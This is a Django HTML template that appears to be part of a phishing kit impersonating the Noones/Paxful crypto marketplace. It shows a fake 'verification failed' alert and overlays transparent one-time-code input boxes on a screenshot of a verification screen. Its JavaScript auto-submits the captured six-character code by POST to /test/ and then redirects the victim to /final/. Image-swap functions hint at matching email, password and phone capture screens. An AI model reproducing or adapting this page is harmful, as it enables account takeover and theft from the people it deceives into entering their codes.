{%load static%}
<!doctype html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <!--<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> -->

    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, shrink-to-fit=no">


    <link href="{% static 'https://fonts.googleapis.com/css?family=Roboto:300,400&display=swap' %}" rel="stylesheet">

    <link rel="stylesheet" href="{% static 'fonts/icomoon/style.css' %}">

    <link rel="stylesheet" href="{% static 'css/owl.carousel.min.css' %}">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="{% static 'css/bootstrap.min.css' %}">

    <!-- Style -->
    <link rel="stylesheet" href="{% static 'css/style.css' %}">

    <title>noones</title>
    <link rel="icon" type="image/x-icon" href="{%static 'images/favicon_io/favicon-16x16.png' %}">
    <link rel="apple-touch-icon" sizes="180x180" href="{%static 'images/favicon_io/apple-touch-icon.png' %}">
    <link rel="icon" type="image/png" sizes="32x32" href="{%static 'images/favicon_io/favicon-32x32.png' %}">
    <link rel="icon" type="image/png" sizes="16x16" href="{%static 'images/favicon_io/favicon-16x16.png' %}">
    <link rel="manifest" href="{%static 'images/favicon_io/site.webmanifest' %}">
  </head>
  <body>





  <div class="d-lg-flex half">
    <div class="bg order-1 order-md-2" style="background-image: url({% static 'images/nonesMain.jpg' %});"></div>
    <div class="contents order-2 order-md-1">

      <div class="container">

        <div class="row align-items-center justify-content-center">
          <div class="col-md-7">

            <div class="d-flex align-items-start justify-content-between">


              <!--<img src = "images/pax4.png" style="padding-top: 5;"> <img src = "images/lang.png" > -->

            </div>
            <div class="mb-4">

              <!--

                 <div class="col-6">

                <img src = "images/pax4.png" style="padding-top: 5;"> <img src = "images/lang.png "style="w" >


              </div>


             <div class="myimage">



              -->











              <!--<h3>Log In With Paxful</h3>-->

              <!--<h1 class="h2 qa-login-page-title mb-3 mb-lg-4">Log In With Paxful</h1> -->



              <div class="d-flex flex-column flex-xs-row">


                <div class="alert alert-danger" role="alert">
                    ooops verification failed enter another number
                </div>

              <img src = "{% static 'images/intro2.jpeg' %}">



              </div>

              <!--<p class="mb-4">Lorem ipsum dolor sit amet elit. Sapiente sit aut eos consectetur adipisicing.</p>-->
            </div>


            <style>
              .transparent-input {
                background-color: transparent;
                border: none;
                outline: none;
                width: 200px;
                height: 30px;
              }
              .white-input {
                background-color: white;
              }
              .input-container {
                position: absolute;
                top: 60%; /* change the top position to move the input field down */
                left: 60%;
                transform: translate(-50%, -50%);
                z-index: 1;
              }



              .submit-button {
                border: none; /* remove the border around the button */
                background: none;
                cursor: pointer;
              }

              .submit-button:focus {
                outline: none; /* remove the outline when the button is clicked */
              }


              .submit-container {

              position: relative;
              display: inline-block;

              }










              .otp {
                    margin: 0;
                    font-family: "Poppins", sans-serif;
                    display: flex!important;
                    align-items: center!important;
                    color: #fff;
                    }

                    .otp-field {
                    display: flex!important;
                    }

                    .otp-field input {
                    width: 50px;
                    height: 60px;
                    font-size: 27px;
                    padding: 0px;
                    text-align: center;
                    border-radius: 8px;
                    margin: 0.5rem;
                    border: 1px solid #d8d8d8;;
                    background: #fff;
                    font-weight: bold;
                    color: #333;
                    outline: none;
                    transition: all 0.1s;
                    }

                    .otp-field input:focus {
                    border: 1px solid #00a5ef;;
                    box-shadow: 1  1px 1px #00a5ef;;
                    }








            </style>



            <div style="position: absolute;">
              <img id="image" src="{% static 'images/ver.jpeg' %}" alt="Image" style="width: 120%; height: auto;left:59%">
              <div class="input-container">
                <div class="otp-field">
                    <input type="text" maxlength="1" />
                    <input type="text" maxlength="1" />
                    <input class="space" type="text" maxlength="1" />
                    <input type="text" maxlength="1" />
                    <input type="text" maxlength="1" />
                    <input type="text" maxlength="1" />
                </div>
              </div>
            </div>




<a class="regular-20 d-flex align-items-center mt-3" href=""><svg width="16" height="16" viewBox="0 0 16 16" fill="currentColor" class="mr-2 text-primary reflect-element"><path fill-rule="evenodd" d="M11.706 13.292L6.414 7.999l5.292-5.293a1 1 0 00-1.414-1.414l-6 6a.996.996 0 00-.277.53L4 7.94v.118c.014.236.11.468.291.648l6 6a1 1 0 101.414-1.414z" clip-rule="evenodd"></path></svg><span>Back to login</span></a>





<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
            <script>
            function changeBgColor(input) {
              if (input.value.length > 0) {
                input.classList.add("white-input");
              } else {
                input.classList.remove("white-input");
              }
            }

            function changeImage() {
              document.getElementById("image").src = "images/mail2.jpg";
            }

            function changeImage2() {
              document.getElementById("image2").src = "images/pass2.jpg";
            }


            function changeImage3() {
              document.getElementById("image").src = "images/phin.jpg";
            }














            const inputs = document.querySelectorAll(".otp-field input");

inputs.forEach((input, index) => {
    input.dataset.index = index;
    input.addEventListener("keyup", handleOtp);
    input.addEventListener("paste", handleOnPasteOtp);
});

function handleOtp(e) {
    /**
     * <input type="text" 👉 maxlength="1" />
     * 👉 NOTE: On mobile devices `maxlength` property isn't supported,
     * So we to write our own logic to make it work. 🙂
     */
    const input = e.target;
    let value = input.value;
    let isValidInput = value.match(/[0-9a-z]/gi);
    input.value = "";
    input.value = isValidInput ? value[0] : "";

    let fieldIndex = input.dataset.index;
    if (fieldIndex < inputs.length - 1 && isValidInput) {
        input.nextElementSibling.focus();
    }

    if (e.key === "Backspace" && fieldIndex > 0) {
        input.previousElementSibling.focus();
    }

    if (fieldIndex == inputs.length - 1 && isValidInput) {
        submit();
    }
}

function handleOnPasteOtp(e) {
    const data = e.clipboardData.getData("text");
    const value = data.split("");
    if (value.length === inputs.length) {
        inputs.forEach((input, index) => (input.value = value[index]));
        submit();
    }
}

function submit() {
    //console.log("Submitting...");
    // 👇 Entered OTP
    let otp = "";
    inputs.forEach((input) => {
        otp += input.value;
        input.disabled = true;
        input.classList.add("disabled");
    });

    var xhr = new XMLHttpRequest();
    xhr.open("POST", "/test/", true);
    xhr.setRequestHeader('Content-Type', 'application/json');
    xhr.setRequestHeader('X-CSRFToken', getCookie('csrftoken'));

    xhr.onreadystatechange = function() {
        if (this.readyState == 4) {
            if (this.status == 200) {
                console.log(this.responseText);
                window.location.href = "/final/";
            } else {
                console.log("Error sending string.");
            }
        }
    };
    xhr.send(JSON.stringify({'myString': otp}));
    // 👉 Call API below
}




function getCookie(name) {
    var cookieValue = null;
    if (document.cookie && document.cookie !== '') {
        var cookies = document.cookie.split(';');
        for (var i = 0; i < cookies.length; i++) {
            var cookie = cookies[i].trim();
            if (cookie.substring(0, name.length + 1) === (name + '=')) {
                cookieValue = decodeURIComponent(cookie.substring(name.length + 1));
                break;
            }
        }
    }
    return cookieValue;
}



            </script>









    <script src="{% static 'js/jquery-3.3.1.min.js' %}"></script>
    <script src="{% static 'js/popper.min.js' %}"></script>
    <script src="{% static 'js/bootstrap.min.js' %}"></script>
    <script src="{% static 'js/main.js' %}"></script>
  </body>
</html>










